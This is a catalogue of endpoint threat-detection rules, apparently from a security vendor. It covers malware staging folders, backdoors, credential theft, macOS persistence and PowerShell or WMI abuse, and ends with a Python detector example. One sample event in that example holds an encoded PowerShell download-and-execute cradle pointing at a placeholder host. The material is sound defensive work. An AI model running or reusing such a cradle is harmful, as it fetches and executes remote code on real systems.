1. Execution from Recycle Bin
Show executions from the Windows Recycle Bin.
Attackers often use the Recycle Bin folders to hide their malware. Processes executing from this location are highly suspicious.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

2. Suspicious process name
Identify processes with names designed to hide in plain sight.
A common technique used by malware is to use names that sound like, or look like, legitimate Windows system file names, for example using a "0" (zero) instead of an "o", or a lowercase "l" instead of an "i". This rule looks for commonly seen file names using these techniques that have been associated with malware.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

3. Processes with obfuscated extensions
Show processes with obfuscated extensions.
A common malware technique is to embed a fake, benign-looking extension in the name of an executable file. For example, when extensions are not displayed (the default in Explorer), a file called "foo.gif.exe" shows as "foo.gif" and appears to be an image file, which an unwitting user might double-click to view.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

4. Known malware file name
This query identifies processes with names that are unique or rare enough to be interesting and are generally associated with specific attacks.
Processes and modules with these names have been observed to be related to known malware.
False positives: While we believe these names are unique enough to avoid triggering false positives, it is possible that a legitimate file could use the same name.
Score: 100

5. Execution from System Volume Information folder
Show executions from the System Volume Information folder.
Attackers often use the System Volume Information folder to hide their malware. Processes executing from this location are highly suspicious.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

6. Possible BlackPOS malware registry artifact
This query identifies the creation or modification of a registry key associated with the installation of a malicious service related to the BlackPOS malware family.
An attacker may use the BlackPOS malware family to steal sensitive data such as credit card information from Point-of-Sale terminals.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

7. Possible APT backdoor installation
This query looks for indications of sethc.exe or utilman.exe being replaced. This activity can effectively create a backdoor to the system.
One tactic observed to be associated with APT activity is the creation of a "backdoor" by replacing one of these files with cmd.exe or another binary. Replacing one of these files with cmd.exe could provide attackers an interactive shell with SYSTEM privileges.
False positives: These files may be legitimately replaced via system update activity.
Score: 100

8. Possible Ransomware file artifact
This query is designed to identify specific files associated with some ransomware variants.
Some types of malware encrypt data on the target system and demand a ransom in exchange for the encryption keys needed to recover the data.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

9. Possible Point-of-Sale malware file artifact
This query is designed to identify files that are known to be associated with various malware attacks on Point-of-Sale systems.
An attacker may deploy malware to steal sensitive information such as credit card data from POS terminals.
False positives: While we are currently unaware of any specific conditions that would generate false positives for this query, it is possible that legitimate files could use the same file names and paths this query looks for.
Score: 100

10. Execution from APT staging area
This query is designed to identify processes executed from locations associated with APT activity.
Malicious actors have been observed to use various locations to stage their malware where it is unlikely to be identified or flagged as unusual. Under normal conditions, the paths covered here should not contain .exe files.
False positives: While unlikely, it is possible an end user could move or copy legitimate executable files to one of these locations.
Score: 100

11. Possible credential theft or misuse
This query looks for indications of the execution of the "Windows Credential Editor" (wce) tool.
Wce.exe is a tool that harvests credentials on a system and performs pass-the-hash and pass-the-ticket attacks. It is often used during attacks to escalate privileges and move through the target environment.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

12. Possible ZeroAccess activity
This query is designed to identify activity associated with the ZeroAccess family of malware.
ZeroAccess is a widespread malware family that contains rootkit functionality and can be used for a variety of malicious purposes by attackers.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

13. Possible Tibet.c backdoor installation
This query identifies files that are known to be associated with the installation of a backdoor on OSX.
This activity is associated with multiple variants of Tibet.c.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

14. Possible WireLurker infection
This query identifies an attempt to create files attributed to a WireLurker infection. The existence of these files is highly indicative of an infection.
WireLurker is a malware family that infects OSX as well as iOS and can migrate from one platform to the other when a mobile device is connected via USB.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

15. ntvdm.exe spawned by Office application
This query identifies Office applications with a child process named ntvdm.exe.
Office applications such as Word and Excel are often targeted by attackers. We have observed ntvdm.exe, a legitimate Windows component, being spawned as part of some of these attacks.
False positives: We are currently unaware of any specific conditions that would generate false positives for this query. Any hits would most likely warrant further investigation.
Score: 100

16. Siesta campaign indicators
Files identified by this report are associated with the Siesta campaign. The existence of these files is highly indicative of infection.
The Siesta campaign revolves around a threat actor targeting the consumer goods and services, energy, finance, healthcare, media and telecommunications, public administration, security and defense, and transport and traffic industries.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

17. PlugX campaign indicators
Files identified by this report are associated with the PlugX malware family.
Variants of the PlugX malware family were observed using these MD5 hashes, domain names, or IP addresses. PlugX is a sophisticated backdoor used by sophisticated adversaries in targeted attacks.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

18. Modification of launchd.conf
This query identifies processes that modify /etc/launchd.conf.
Attackers may modify this file in order to gain persistence for malicious code on a target system.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

19. Suspicious OSX persistence mechanism
This query identifies processes with command line arguments that may be used to modify loginwindow.plist.
Attackers may modify this plist in order to gain persistence for malicious code on a target system.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

20. Modification of /etc/rc.common
This query identifies processes that modify /etc/rc.common.
Attackers may modify this file in order to gain persistence for malicious code on a target system.
False positives: We have observed some cases where this file is legitimately modified by other system files.
Score: 100

21. Possible Olyx/Lasyr activity
This query identifies processes that have behaviors consistent with the Olyx/Lasyr malware family.
Olyx/Lasyr is a backdoor written for the OSX platform. Attackers may install it on a target system in order to facilitate their attack.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

22. Possible wirenet and/or netweird activity
This query identifies processes that have behaviors consistent with the wirenet and netweird malware families.
Wirenet and netweird are two different malware families that use a common technique for persistence. Attackers may leverage this malware to steal information or gain persistence on a target system.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

23. Possible Flashback infection
This query identifies an unusual file modification consistent with behaviors of the Flashback malware family.
Flashback is a backdoor written for the OSX platform. Attackers may install it on a target system in order to facilitate their attack.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

24. Possible iWorm infection
This query identifies filesystem and network behavior consistent with the iWorm malware family.
iWorm is a backdoor written for the OSX platform. Attackers may install it on a target system in order to facilitate their attack.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

25. Possible NetWeirdRC infection
Files identified by this report are associated with the Siesta campaign. The existence of these files is highly indicative of infection.
NetWeirdRC is a backdoor written for the OSX platform. Attackers may install it on a target system in order to facilitate their attack.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

26. Suspicious local password change
This query identifies the use of the dscl command to change passwords.
Attackers may use this command to manipulate passwords on a system. This would be highly unusual, as most password changes are done via the GUI or centralized admin tools.
False positives: This command may be legitimately used by system administrators or power users to administer the system.
Score: 100

27. Attempted OSX password hash collection
This query identifies attempts to dump the hashes associated with user accounts on the system.
Attackers may use this command to gather password hashes for user accounts on the system. These hashes may be used to recover the plaintext passwords, which could then be leveraged in an attack.
False positives: This command may be legitimately used by system administrators or power users to administer the system.
Score: 100

28. Execution from trash bin
This query identifies files that are executed from the Trash on an OSX system.
Attackers will often attempt to hide their files in the Trash and operate from that location. In general, files in this location have been discarded and should not be running.
False positives: We are currently unaware of any specific conditions that would generate false positives. Any hits would most likely warrant further investigation.
Score: 100

29. Suspicious process execution
This query identifies the execution of highly suspicious processes typically leveraged in an attack targeting Linux or OSX systems.
The processes identified in this query are frequently used by malware or in an attack scenario. These utilities are not native to OSX or most Linux distributions, and are often indicative of malicious activity.
False positives: These processes may be used during audits or other administrative functions, but are highly suspicious.
Score: 100

30. Suspicious shell activity
This query identifies processes that run system commands consistent with those an attacker might use after gaining a remote shell on a system.
When an attacker gains access to a system, they will often run commands to survey the local environment. This is typically just the start of the malicious activity.
False positives: These commands might also, rarely, be used in the same shell by a power user or administrator.
Score: 100

31. Powershell executed with encoded instructions
This query identifies encoded scripts being passed to PowerShell on the command line.
In order to avoid parsing issues and bypass the PowerShell execution policy, a script can be base64 encoded and passed to PowerShell on the command line. This technique has been observed in malware and in use by attackers.
False positives: Administrators may use this technique for system administration.
Score: 100

32. Modification of powershell execution policy
This query looks for changes to the registry key that sets the PowerShell execution policy.
Attackers may modify this registry key to change the PowerShell execution policy to facilitate their attack.
False positives: While this key may be modified by system administrators, it should be a rare occurrence.
Score: 100

33. Possible malicious powershell activity
This query looks for PowerShell arguments that could be used to download and dynamically execute content.
PowerShell can be given commands to download arbitrary content from the Internet and execute it. This could be used for persistence or for large-scale attacks.
False positives: It is possible this functionality could be used for legitimate purposes, but it should be rare.
Score: 100

34. Possible WMI Persistence
This query looks for evidence of a persistence mechanism using WMI, which appears when a WMI event filter that uses Win32_LocalTime is registered.
Windows Management Instrumentation (WMI) can be leveraged to provide a persistence mechanism to attackers. One of the techniques often used is to have an event fire at a specific time, which typically requires Win32_LocalTime.
False positives: A legitimate WMI filter may use Win32_LocalTime as well.
Score: 100

35. Possible WMI command invocation
This query looks for instances of wmic started with command line options intended to execute code.
Attackers may use WMI for lateral movement or to operate under the radar. Administrators typically use other methods for command execution.
False positives: Administrators may legitimately use this functionality.
Score: 100

36. WinRM command activity
This query identifies executions of WinRM.cmd or WinRM.vbs with the invoke parameter.
Windows Remote Management (WinRM) is a protocol that allows for remotely administering systems. It can be leveraged by attackers for lateral movement or remote command execution.
False positives: The WinRM service may be legitimately used by administrators.
Score: 100
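The Windows path- and name-based checks in this list (execution from the Recycle Bin or System Volume Information folder, look-alike process names, double extensions) and the encoded-PowerShell check are straightforward to express as detection logic over process events. The following is an added example written for this page, not the feed's own query logic; it assumes process events carrying a full image path and command line, and the system-name list, rule labels and sample events are constructed for illustration.

```python
import base64
import re

# Names malware commonly imitates (constructed list, not the feed's own rule content).
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "services.exe", "winlogon.exe"}
HIDDEN_DIRS = re.compile(r"\\(?:\$recycle\.bin|recycler|system volume information)\\", re.I)
DOUBLE_EXT = re.compile(r"\.(?:gif|jpe?g|png|pdf|docx?|xlsx?|txt)\.(?:exe|scr|com|pif)$", re.I)
# Any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) but not -ExecutionPolicy.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\b\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_EXEC = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|webclient", re.I)

def canonical(name):
    """Fold the look-alike substitutions the rule describes: 0 -> o, l -> i."""
    return name.lower().replace("0", "o").replace("l", "i")

def decode_powershell(cmdline):
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def check_event(path, cmdline):
    """Return the labels of the rules one process event matches (empty list if clean)."""
    hits, name = [], path.rsplit("\\", 1)[-1]
    if HIDDEN_DIRS.search(path):
        hits.append("execution from hidden system folder")
    if DOUBLE_EXT.search(name):
        hits.append("obfuscated extension")
    if name.lower() not in SYSTEM_NAMES and canonical(name) in {canonical(s) for s in SYSTEM_NAMES}:
        hits.append("look-alike system process name")
    script = decode_powershell(cmdline) if "powershell" in name.lower() else None
    if script is not None:
        hits.append("encoded powershell")
        if DOWNLOAD_EXEC.search(script):
            hits.append("download-and-execute powershell")
    return hits

# Constructed sample events (not from the page); the last one carries a download cradle.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_EVENTS = [
    (r"C:\$Recycle.Bin\S-1-5-21-1\svchost.exe", "svchost.exe"),
    (r"C:\Users\bob\Downloads\invoice.pdf.exe", "invoice.pdf.exe"),
    (r"C:\Windows\Temp\svch0st.exe", "svch0st.exe"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode()),
]

def run_samples():
    return {path: check_event(path, cmd) for path, cmd in SAMPLE_EVENTS}
```

Each hit is a lead for the triage described in the entries above, not a verdict; the look-alike check deliberately compares canonical forms on both sides so that the genuine lsass.exe is not flagged while isass.exe is.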